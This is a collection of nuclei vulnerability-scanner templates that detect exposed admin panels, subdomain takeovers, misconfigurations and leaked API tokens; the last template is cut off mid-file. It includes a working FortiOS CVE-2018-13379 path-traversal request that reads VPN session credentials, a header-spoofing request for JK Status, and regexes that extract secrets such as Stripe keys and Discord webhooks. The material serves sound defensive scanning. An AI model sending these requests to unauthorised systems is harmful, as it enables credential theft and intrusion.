7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - ";->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V" 
-------------------------------------------------------------------------------- /takeovers/kinsta-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: kinsta-takeover 2 | 3 | info: 4 | name: kinsta takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - No Site For Domain -------------------------------------------------------------------------------- /technologies/werkzeug-debugger-detect.yaml: -------------------------------------------------------------------------------- 1 | id: werkzeug-debugger-detect 2 | 3 | info: 4 | name: Werkzeug debugger console 5 | author: pdteam 6 | severity: info 7 | tags: tech,werkzeug 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/console" 13 | matchers: 14 | - type: word 15 | words: 16 | - "

Interactive Console

" 17 | part: body 18 | -------------------------------------------------------------------------------- /workflows/wordpress-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-workflow 2 | info: 3 | name: Wordpress Security Checks 4 | author: kiblyn11,zomsop82 5 | description: A simple workflow that runs all wordpress related nuclei templates on a given target. 6 | 7 | workflows: 8 | 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: wordpress 12 | subtemplates: 13 | - tags: wordpress -------------------------------------------------------------------------------- /exposed-panels/exposed-pagespeed-global-admin.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-pagespeed-global-admin 2 | 3 | info: 4 | name: Apache PageSpeed Global Admin Dashboard Exposure 5 | author: pdteam 6 | severity: medium 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/pagespeed_admin/' 13 | matchers: 14 | - type: word 15 | words: 16 | - "Pagespeed Admin" -------------------------------------------------------------------------------- /exposed-panels/parallels-html-client.yaml: -------------------------------------------------------------------------------- 1 | id: parallels-html-client 2 | 3 | info: 4 | name: Parallels HTML5 Client 5 | author: pdteam 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/RASHTML5Gateway/" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Parallels HTML5 Client" 17 | part: body 18 | -------------------------------------------------------------------------------- /exposures/tokens/generic/jwt-token.yaml: -------------------------------------------------------------------------------- 1 | id: jwt-token 2 | 3 | info: 4 | name: JWT Token Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: 
GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - 'eyJ[a-zA-Z0-9]{10,}\.eyJ[a-zA-Z0-9]{10,}\.[a-zA-Z0-9_\-]{10,}' -------------------------------------------------------------------------------- /exposures/tokens/sonarqube/sonarqube-token.yaml: -------------------------------------------------------------------------------- 1 | id: sonarqube-token 2 | 3 | info: 4 | name: SonarQube Token Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - "sonar.{0,50}(?:\"|'|`)?[0-9a-f]{40}(?:\"|'|`)?" -------------------------------------------------------------------------------- /exposures/tokens/stripe/stripe-restricted-key.yaml: -------------------------------------------------------------------------------- 1 | id: stripe-restricted-key 2 | 3 | info: 4 | name: Stripe Restricted Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'rk_(?:live|test)_[0-9a-zA-Z]{24}' -------------------------------------------------------------------------------- /technologies/shiro-detect.yaml: -------------------------------------------------------------------------------- 1 | id: shiro-detect 2 | 3 | info: 4 | name: Detect Shiro Framework 5 | author: AresX 6 | severity: info 7 | tags: tech,shiro 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | headers: 14 | Cookie: rememberMe=123; 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - 'rememberMe=deleteMe' 20 | part: header -------------------------------------------------------------------------------- /exposed-panels/manage-engine-admanager-panel.yaml: 
-------------------------------------------------------------------------------- 1 | id: manage-engine-admanager-panel 2 | 3 | info: 4 | name: Manage Engine ADManager Panel 5 | author: PR3R00T 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/authorization.do" 13 | matchers: 14 | - type: word 15 | words: 16 | - "ManageEngine - ADManager Plus" 17 | -------------------------------------------------------------------------------- /misconfiguration/jkstatus-manager.yaml: -------------------------------------------------------------------------------- 1 | id: jkstatus-manager 2 | 3 | info: 4 | name: JK Status Manager 5 | author: pdteam 6 | severity: low 7 | tags: config 8 | 9 | requests: 10 | - method: GET 11 | headers: 12 | X-Forwarded-For: "127.0.0.1" 13 | path: 14 | - "{{BaseURL}}/jkstatus/" 15 | matchers: 16 | - type: word 17 | words: 18 | - "JK Status Manager" 19 | -------------------------------------------------------------------------------- /takeovers/jazzhr-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: jazzhr-takeover 2 | 3 | info: 4 | name: jazzhr takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - This account no longer active -------------------------------------------------------------------------------- /takeovers/mashery-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: mashery-takeover 2 | 3 | info: 4 | name: mashery takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - 
Unrecognized domain -------------------------------------------------------------------------------- /takeovers/readme-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: readme-takeover 2 | 3 | info: 4 | name: readme takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - Project doesnt exist... yet! -------------------------------------------------------------------------------- /takeovers/smugmug-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: smugmug-takeover 2 | 3 | info: 4 | name: smugmug takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - '{"text":"Page Not Found"' -------------------------------------------------------------------------------- /takeovers/surveygizmo-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: surveygizmo-takeover 2 | 3 | info: 4 | name: surveygizmo takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - data-html-name -------------------------------------------------------------------------------- /takeovers/tave-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: tave-takeover 2 | 3 | info: 4 | name: tave takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: 
https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - "

Error 404: Page Not Found

" -------------------------------------------------------------------------------- /technologies/google-storage.yaml: -------------------------------------------------------------------------------- 1 | id: gstorage-detect 2 | 3 | info: 4 | name: Google Bucket detection 5 | author: 0xTeles 6 | severity: info 7 | tags: tech,gstorage,google,bucket 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | matchers: 14 | - type: word 15 | words: 16 | - x-goog-metageneration 17 | - X-Goog-Metageneration 18 | part: header -------------------------------------------------------------------------------- /workflows/artica-web-proxy-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: artica-web-proxy-workflow 2 | 3 | info: 4 | name: Artica Web Proxy Security Checks 5 | author: dwisiswant0,pdteam 6 | description: A simple workflow that runs all Artica Web Proxy related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/artica-web-proxy-detect.yaml 10 | subtemplates: 11 | - template: cves/2020/CVE-2020-17505.yaml -------------------------------------------------------------------------------- /workflows/jellyfin-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: jellyfin-workflow 2 | info: 3 | name: Jellyfin Security Checks 4 | author: dwisiswant0 5 | description: A simple workflow that runs all Jellyfin related nuclei templates on a given target. 
6 | 7 | workflows: 8 | - template: technologies/jellyfin-detect.yaml 9 | subtemplates: 10 | - template: cves/2020/CVE-2020-26948.yaml 11 | - template: cves/2021/CVE-2021-21402.yaml -------------------------------------------------------------------------------- /cves/2018/CVE-2018-13379.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-13379 2 | 3 | info: 4 | name: FortiOS - Credentials Disclosure 5 | author: organiccrap 6 | severity: high 7 | tags: cve,cve2018,fortios 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" 13 | matchers: 14 | - type: word 15 | words: 16 | - "var fgt_lang" 17 | -------------------------------------------------------------------------------- /exposed-panels/dotcms-admin-panel.yaml: -------------------------------------------------------------------------------- 1 | id: dotcms-admin-panel 2 | 3 | info: 4 | name: dotAdmin Panel 5 | author: impramodsargar 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/dotAdmin/" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'dotCMS Content Management Platform' 19 | -------------------------------------------------------------------------------- /exposed-panels/druid-console-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: druid-console-exposure 2 | 3 | info: 4 | name: Alibaba Druid Console Exposure 5 | author: pdteam 6 | severity: medium 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'src="/druid.js"' 18 | - 'href="/druid.css"' 19 | condition: and -------------------------------------------------------------------------------- /exposed-panels/github-enterprise-detect.yaml: 
-------------------------------------------------------------------------------- 1 | id: github-enterprise-detect 2 | 3 | info: 4 | name: Detect Github Enterprise 5 | author: ehsahil 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/login" 13 | 14 | redirects: true 15 | max-redirects: 2 16 | matchers: 17 | - type: word 18 | words: 19 | - "GitHub · Enterprise" 20 | -------------------------------------------------------------------------------- /exposures/tokens/amazon/amazon-sns-topic.yaml: -------------------------------------------------------------------------------- 1 | id: amazon-sns-topic 2 | 3 | info: 4 | name: Amazon SNS Topic Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,amazon 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+' -------------------------------------------------------------------------------- /miscellaneous/detect-options-method.yaml: -------------------------------------------------------------------------------- 1 | id: detect-options-method 2 | 3 | info: 4 | name: Detect enabled OPTIONS methods 5 | author: pdteam 6 | severity: info 7 | tags: misc,generic 8 | 9 | requests: 10 | - method: OPTIONS 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: header 17 | group: 1 18 | regex: 19 | - "Allow: ([A-Z, ]+)" 20 | -------------------------------------------------------------------------------- /takeovers/hatenablog-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: hatenablog-takeover 2 | 3 | info: 4 | name: hatenablog takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | 
matchers: 16 | - type: word 17 | words: 18 | - 404 Blog is not found -------------------------------------------------------------------------------- /takeovers/zendesk-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: zendesk-takeover 2 | 3 | info: 4 | name: zendesk takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - this help center no longer exists -------------------------------------------------------------------------------- /.github/workflows/syntax-checking.yml: -------------------------------------------------------------------------------- 1 | name: ❄️ YAML Lint 2 | 3 | on: [push, pull_request] 4 | 5 | jobs: 6 | build: 7 | runs-on: ubuntu-latest 8 | steps: 9 | - uses: actions/checkout@v2 10 | - name: Yamllint 11 | uses: karancode/yamllint-github-action@master
# NOTE(review): this third-party action is referenced by a mutable branch (`@master`) and checkout by a mutable tag (`@v2`); anyone who can push to that upstream ref can change what runs in this workflow on every push/PR. Pin each action to a full commit SHA (with the version in a trailing comment) rather than a branch or tag.
12 | with: 13 | yamllint_config_filepath: .yamllint 14 | yamllint_strict: false 15 | yamllint_comment: true 16 | -------------------------------------------------------------------------------- /exposed-panels/ansible-tower-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: ansible-tower-exposure 2 | 3 | info: 4 | name: Ansible Tower Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "Ansible Tower" 18 | - "ansible-main-menu" 19 | condition: and -------------------------------------------------------------------------------- /exposed-panels/exposed-webalizer.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-webalizer 2 | 3 | info: 4 | name: Publicly exposed Webalizer Interface 5 | author: pdteam 6 
| severity: low 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/webalizer/' 13 | matchers: 14 | - type: word 15 | words: 16 | - "Webalizer Version" 17 | - "Usage statistics for" 18 | condition: and -------------------------------------------------------------------------------- /exposed-panels/phppgadmin-panel.yaml: -------------------------------------------------------------------------------- 1 | id: phppgadmin-panel 2 | 3 | info: 4 | name: phpPgAdmin Panel 5 | author: Ganofins 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/phppgadmin/" 13 | matchers: 14 | - type: word 15 | words: 16 | - "phpPgAdmin" 17 | - "browser.php" 18 | - "intro.php" 19 | condition: and 20 | -------------------------------------------------------------------------------- /exposed-panels/traefik-dashboard.yaml: -------------------------------------------------------------------------------- 1 | id: traefik-dashboard-detect 2 | 3 | info: 4 | name: Traefik Dashboard 5 | author: schniggie,StreetOfHackerR007 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/dashboard/" 13 | matchers: 14 | - type: word 15 | words: 16 | - "" 17 | part: body 18 | -------------------------------------------------------------------------------- /exposed-panels/webmin-panel.yaml: -------------------------------------------------------------------------------- 1 | id: webmin-panel 2 | 3 | info: 4 | name: Webmin Admin Panel 5 | author: PR3R00T 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | - "{{BaseURL}}/webmin/" 14 | redirects: true 15 | matchers: 16 | - type: word 17 | words: 18 | - "Login to Webmin" 19 | part: body 20 | -------------------------------------------------------------------------------- /exposures/configs/perl-status.yaml: 
-------------------------------------------------------------------------------- 1 | id: perl-status 2 | 3 | info: 4 | name: Apache mod_perl Status Page Exposure 5 | author: pdteam 6 | severity: medium 7 | tags: config,exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/perl-status' 13 | matchers: 14 | - type: word 15 | words: 16 | - "Apache2::Status" 17 | - "Perl version" 18 | condition: and -------------------------------------------------------------------------------- /takeovers/feedpress-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: feedpress-takeover 2 | 3 | info: 4 | name: feedpress takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - 'The feed has not been found.' -------------------------------------------------------------------------------- /takeovers/gemfury-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: gemfury-takeover 2 | 3 | info: 4 | name: gemfury takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - "404: This page could not be found." 
-------------------------------------------------------------------------------- /takeovers/jetbrains-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: jetbrains-takeover 2 | 3 | info: 4 | name: jetbrains takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | matchers: 15 | - type: word 16 | words: 17 | - is not a registered InCloud YouTrack. -------------------------------------------------------------------------------- /takeovers/readthedocs-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: readthedocs-takeover 2 | 3 | info: 4 | name: readthedocs takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - unknown to Read the Docs -------------------------------------------------------------------------------- /takeovers/teamwork-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: teamwork-takeover 2 | 3 | info: 4 | name: teamwork takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - Oops - We didn't find your site. 
-------------------------------------------------------------------------------- /vulnerabilities/jira/jira-unauthenticated-user-picker.yaml: -------------------------------------------------------------------------------- 1 | id: jira-unauthenticated-user-picker 2 | 3 | info: 4 | name: Jira Unauthenticated User Picker 5 | author: TechbrunchFR 6 | severity: info 7 | tags: atlassian,jira 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/secure/popups/UserPickerBrowser.jspa" 13 | matchers: 14 | - type: word 15 | words: 16 | - 'user-picker' -------------------------------------------------------------------------------- /workflows/micro-focus-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: micro-focus-workflow 2 | 3 | info: 4 | name: Micro Focus Checks 5 | author: dwisiswant0 6 | description: A simple workflow that runs all Micro Focus related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml 10 | - template: cves/2020/CVE-2020-11853.yaml 11 | - template: cves/2020/CVE-2020-11854.yaml 12 | -------------------------------------------------------------------------------- /exposed-panels/active-admin-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: active-admin-exposure 2 | 3 | info: 4 | name: ActiveAdmin Admin Dashboard Exposure 5 | author: pdteam 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/admin/login' 13 | matchers: 14 | - type: word 15 | words: 16 | - "active_admin_content" 17 | - "active_admin-" 18 | condition: and -------------------------------------------------------------------------------- /exposed-panels/prometheus-exposed-panel.yaml: -------------------------------------------------------------------------------- 1 | id: prometheus-exposed-panel 2 | 3 | info: 4 | name: Prometheus.io exposed 
panel 5 | author: organiccrap 6 | severity: low 7 | tags: panel,prometheus 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/graph' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - '<title>Prometheus Time Series Collection and Processing Server' -------------------------------------------------------------------------------- /exposed-panels/selenoid-ui-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: selenoid-ui-exposure 2 | 3 | info: 4 | name: Selenoid UI Dashboard Exposure 5 | author: pdteam 6 | severity: medium 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/admin/login' 13 | matchers: 14 | - type: word 15 | words: 16 | - "Selenoid UI" 17 | - "/manifest.json" 18 | condition: and -------------------------------------------------------------------------------- /exposures/logs/struts-debug-mode.yaml: -------------------------------------------------------------------------------- 1 | id: struts-debug-mode 2 | 3 | info: 4 | name: Apache Struts setup in Debug-Mode 5 | author: pdteam 6 | severity: low 7 | tags: logs,struts,apache,exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "" 18 | - "" 19 | condition: and -------------------------------------------------------------------------------- /exposures/tokens/generic/jdbc-connection-string.yaml: -------------------------------------------------------------------------------- 1 | id: jdbc-connection-string 2 | 3 | info: 4 | name: JDBC Connection String Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - 'jdbc:[a-z:]+://[A-Za-z0-9\.\-_:;=/@?,&]+' -------------------------------------------------------------------------------- 
/file/android/dynamic-broadcast-receiver.yaml: -------------------------------------------------------------------------------- 1 | id: dynamic-registered-broadcast-receiver 2 | 3 | info: 4 | name: Dynamic Registered Broadcast Receiver 5 | author: gaurang 6 | severity: info 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - ";->registerReceiver(Landroid/content/BroadcastReceiver;Landroid/content/IntentFilter;)" -------------------------------------------------------------------------------- /file/android/provider-path.yaml: -------------------------------------------------------------------------------- 1 | id: insecure-provider-path 2 | 3 | info: 4 | name: Insecure Provider Path 5 | author: gaurang 6 | severity: medium 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: regex 15 | regex: 16 | - "root-path name=\"[0-9A-Za-z\\-_]{1,10}\" path=\".\"" 17 | - "root-path name=\"[0-9A-Za-z\\-_]{1,10}\" path=\"\"" 18 | -------------------------------------------------------------------------------- /takeovers/agilecrm-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: agilecrm-takeover 2 | 3 | info: 4 | name: agilecrm takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - Sorry, this page is no longer available. 
-------------------------------------------------------------------------------- /takeovers/aha-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: aha-takeover 2 | 3 | info: 4 | name: Aha Takeover Detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - There is no portal here ... sending you back to Aha! -------------------------------------------------------------------------------- /takeovers/vend-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: vend-takeover 2 | 3 | info: 4 | name: vend takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - Looks like you've traveled too far into cyberspace. -------------------------------------------------------------------------------- /exposed-panels/activemq-panel.yaml: -------------------------------------------------------------------------------- 1 | id: activemq-panel 2 | 3 | info: 4 | name: Apache ActiveMQ Exposure 5 | author: pdteam 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - '

Welcome to the Apache ActiveMQ!

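# Reflowed nuclei templates from a collapsed listing; every file is introduced by a "# ---- path ----" comment.
# (tail of the preceding Apache ActiveMQ panel template; its header and the first word item lie before this chunk)
          - 'Apache ActiveMQ'
        condition: and

# ---- /exposed-panels/atlassian-crowd-panel.yaml ----
id: atlassian-crowd-panel

info:
  name: Atlassian Crowd panel detect
  author: organiccrap
  severity: info
  tags: panel

requests:
  - method: GET
    path:
      - '{{BaseURL}}/crowd/console/login.action'

    matchers:
      - type: word
        words:
          - Atlassian Crowd - Login
        part: body

# ---- /exposures/configs/ansible-config-disclosure.yaml ----
id: ansible-config-disclosure

info:
  name: Ansible Configuration Exposure
  author: pdteam
  severity: medium
  tags: config,exposure

requests:
  - method: GET
    path:
      - '{{BaseURL}}/ansible.cfg'
    matchers:
      - type: word
        words:
          - '[defaults]'
          - '[inventory]'
        # both INI section headers are required so an arbitrary INI file does not match
        condition: and

# ---- /exposures/files/drupal-install.yaml ----
id: drupal-install

info:
  name: Drupal Install
  author: NkxxkN
  severity: low
  tags: exposure

requests:
  - method: GET
    path:
      - "{{BaseURL}}/install.php?profile=default"

    redirects: true
    max-redirects: 1
    matchers:
      - type: word
        words:
          # NOTE(review): a reachable installer may allow the site to be re-configured; treat a hit as
          # more than an information leak and confirm manually before closing it as "low".
          - "Choose language | Drupal"

# ---- /exposures/tokens/artifactory/artifactory-api-token.yaml ----
id: artifactory-api-token

info:
  name: Artifactory API Token Disclosure
  author: Ice3man
  severity: info
  tags: exposure,token,artifactory

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    extractors:
      - type: regex
        part: body
        regex:
          # anchored on a separator so the AKC prefix is not picked out of the middle of a longer word
          - '(?:\s|=|:|"|^)AKC[a-zA-Z0-9]{10,}'

# ---- /exposures/tokens/discord/discord-webhook.yaml ----
id: discord-webhook

info:
  name: Discord Webhook Disclosure
  author: Ice3man
  severity: info
  tags: exposure,token,discord

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    extractors:
      - type: regex
        part: body
        regex:
          # Webhook URLs are served from the legacy discordapp.com host and the current discord.com
          # host; the original pattern only covered the former. Tokens may contain '_' as well as '-'.
          - 'https://(?:discordapp|discord)\.com/api/webhooks/[0-9]+/[A-Za-z0-9\-_]+'

# ---- /exposures/tokens/zoho/zoho-webhook-token.yaml ----
id: zoho-webhook-token

info:
  name: Zoho Webhook Disclosure
  author: Ice3man
  severity: info
  tags: exposure,token

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    extractors:
      - type: regex
        part: body
        regex:
          - 'https://creator\.zoho\.com/api/[A-Za-z0-9/\-_\.]+\?authtoken=[A-Za-z0-9]+'

# ---- /network/memcached-stats.yaml ----
id: memcached-stats

info:
  name: Memcached stats disclosure
  author: pdteam
  severity: low
  tags: network,memcached

network:
  - inputs:
      # plain-text "stats" followed by "quit" so the connection is closed cleanly
      - data: "stats\r\n\r\nquit\r\n"

    host:
      - "{{Hostname}}"
      - "{{Hostname}}:11211"
    read-size: 2048

    matchers:
      - type: word
        words:
          # NOTE(review): a "STAT " reply means the daemon answers unauthenticated commands from the
          # scanner's network position; that is usually more than a "low" finding on an internet-facing host.
          - "STAT "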
# Reflowed nuclei templates; each file of the listing is introduced by a "# ---- path ----" comment.

# ---- /takeovers/helpjuice-takeover.yaml ----
id: helpjuice-takeover

info:
  name: helpjuice takeover detection
  severity: high
  author: pdteam
  tags: takeover
  reference: https://github.com/EdOverflow/can-i-take-over-xyz

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        # The phrase is generic; confirm the host's CNAME points at the provider before treating a hit
        # as a real dangling record (the template itself performs no DNS check).
        words:
          - We could not find what you're looking for.

# ---- /takeovers/wishpond-takeover.yaml ----
id: wishpond-takeover

info:
  name: wishpond takeover detection
  severity: high
  author: pdteam
  tags: takeover
  reference: https://github.com/EdOverflow/can-i-take-over-xyz

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - https://www.wishpond.com/404?campaign=true

# ---- /exposed-panels/checkmarx-panel.yaml ----
id: checkmarx-panel-detect

info:
  name: Checkmarx WebClient detector
  severity: info
  author: joanbono
  tags: panel

requests:
  - method: GET
    path:
      - "{{BaseURL}}/cxwebclient/Login.aspx"

    matchers:
      - type: word
        part: body
        words:
          - '/CxWebClient/webApp/Scripts/libs/authenticationScripts'

# ---- /exposed-panels/hmc-hybris-panel.yaml ----
id: hmc-hybris-panel

info:
  name: SAP Hybris Management Console
  severity: info
  author: dogasantos
  tags: panel

requests:
  - method: GET
    # the console is mounted at either prefix depending on deployment
    path:
      - "{{BaseURL}}/hmc/hybris"
      - "{{BaseURL}}/hybris/hmc/hybris"

    matchers:
      - type: word
        part: body
        words:
